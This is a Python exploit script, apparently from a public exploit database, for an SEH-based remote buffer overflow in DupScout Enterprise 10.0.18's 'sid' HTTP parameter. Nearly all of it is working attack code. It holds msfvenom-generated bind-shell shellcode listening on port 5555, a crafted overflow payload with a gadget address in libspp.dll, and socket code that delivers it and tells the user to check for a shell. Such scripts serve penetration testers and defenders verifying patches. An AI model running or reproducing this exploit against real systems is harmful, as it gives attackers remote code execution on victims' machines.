#!/usr/bin/env python3
# Exploit Title: DupScout Enterprise 10.0.18 'sid' Remote Buffer Overflow (SEH)
# Date: 2020-12-08
# Discovered by: Fluid Attacks
# Exploit Author: Andres Roldan at Fluid Attacks
# Vendor Homepage: http://www.dupscout.com
# Software Link: http://www.dupscout.com/setups/dupscoutent_setup_v10.0.18.exe
# Version: 10.0.18
# Tested on: Windows 10 Pro x64

import socket
import struct

HOST = "127.0.0.1"
PORT = 80

# msfvenom --platform windows --arch x86 -p windows/shell_bind_tcp
# LPORT=5555 EXITFUNC=thread -b "\x00\x09\x0a\x0d\x20" -f python -v SHELL
SHELL = b""
SHELL += b"\xd9\xc1\xd9\x74\x24\xf4\x5a\x2b\xc9\xbd\xb2\x01"
SHELL += b"\x0f\xaa\xb1\x53\x31\x6a\x17\x83\xc2\x04\x03\xd8"
SHELL += b"\x12\xed\x5f\xe0\xfd\x73\x9f\x18\xfe\x13\x29\xfd"
SHELL += b"\xcf\x13\x4d\x76\x7f\xa4\x05\xda\x8c\x4f\x4b\xce"
SHELL += b"\x07\x3d\x44\xe1\xa0\x88\xb2\xcc\x31\xa0\x87\x4f"
SHELL += b"\xb2\xbb\xdb\xaf\x8b\x73\x2e\xae\xcc\x6e\xc3\xe2"
SHELL += b"\x85\xe5\x76\x12\xa1\xb0\x4a\x99\xf9\x55\xcb\x7e"
SHELL += b"\x49\x57\xfa\xd1\xc1\x0e\xdc\xd0\x06\x3b\x55\xca"
SHELL += b"\x4b\x06\x2f\x61\xbf\xfc\xae\xa3\xf1\xfd\x1d\x8a"
SHELL += b"\x3d\x0c\x5f\xcb\xfa\xef\x2a\x25\xf9\x92\x2c\xf2"
SHELL += b"\x83\x48\xb8\xe0\x24\x1a\x1a\xcc\xd5\xcf\xfd\x87"
SHELL += b"\xda\xa4\x8a\xcf\xfe\x3b\x5e\x64\xfa\xb0\x61\xaa"
SHELL += b"\x8a\x83\x45\x6e\xd6\x50\xe7\x37\xb2\x37\x18\x27"
SHELL += b"\x1d\xe7\xbc\x2c\xb0\xfc\xcc\x6f\xdd\x31\xfd\x8f"
SHELL += b"\x1d\x5e\x76\xfc\x2f\xc1\x2c\x6a\x1c\x8a\xea\x6d"
SHELL += b"\x63\xa1\x4b\xe1\x9a\x4a\xac\x28\x59\x1e\xfc\x42"
SHELL += b"\x48\x1f\x97\x92\x75\xca\x02\x9a\xd0\xa5\x30\x67"
SHELL += b"\xa2\x15\xf5\xc7\x4b\x7c\xfa\x38\x6b\x7f\xd0\x51"
SHELL += b"\x04\x82\xdb\x48\x66\x0b\x3d\x18\x98\x5a\x95\xb4"
SHELL += b"\x5a\xb9\x2e\x23\xa4\xeb\x06\xc3\xed\xfd\x91\xec"
SHELL += b"\xed\x2b\xb6\x7a\x66\x38\x02\x9b\x79\x15\x22\xcc"
SHELL += b"\xee\xe3\xa3\xbf\x8f\xf4\xe9\x57\x33\x66\x76\xa7"
SHELL += b"\x3a\x9b\x21\xf0\x6b\x6d\x38\x94\x81\xd4\x92\x8a"
SHELL += b"\x5b\x80\xdd\x0e\x80\x71\xe3\x8f\x45\xcd\xc7\x9f"
SHELL += b"\x93\xce\x43\xcb\x4b\x99\x1d\xa5\x2d\x73\xec\x1f"
SHELL += b"\xe4\x28\xa6\xf7\x71\x03\x79\x81\x7d\x4e\x0f\x6d"
SHELL += b"\xcf\x27\x56\x92\xe0\xaf\x5e\xeb\x1c\x50\xa0\x26"
SHELL += b"\xa5\x70\x43\xe2\xd0\x18\xda\x67\x59\x45\xdd\x52"
SHELL += b"\x9e\x70\x5e\x56\x5f\x87\x7e\x13\x5a\xc3\x38\xc8"
SHELL += b"\x16\x5c\xad\xee\x85\x5d\xe4"

PAYLOAD = (
    b"\x90" * (2482 - len(SHELL))
    + SHELL
    + b"\xeb\x10\x90\x90"
    +
    # 0x1002071c: add esp,8 # ret 0x04 at libspp.dll (ASLR: False, Rebase: False, SafeSEH: False)
    struct.pack("<L", 0x1002071C)
    + b"\x90" * 32
    + b"\xE9\x4D\xF6\xFF\xFF"
    + b"C" * (10000 - 2482 - 4 - 32)
)

HTTP_PAYLOAD = (
    b"GET /settings&sid="
    + PAYLOAD
    + b" HTTP/1.1\r\n"
    + b"Host: "
    + HOST.encode()
    + b"\r\n\r\n"
)

with socket.create_connection((HOST, PORT)) as fd:
    print("[+] Sending payload...")
    fd.sendall(HTTP_PAYLOAD)
    print("[+] Done. Check for a shell on port 5555.")
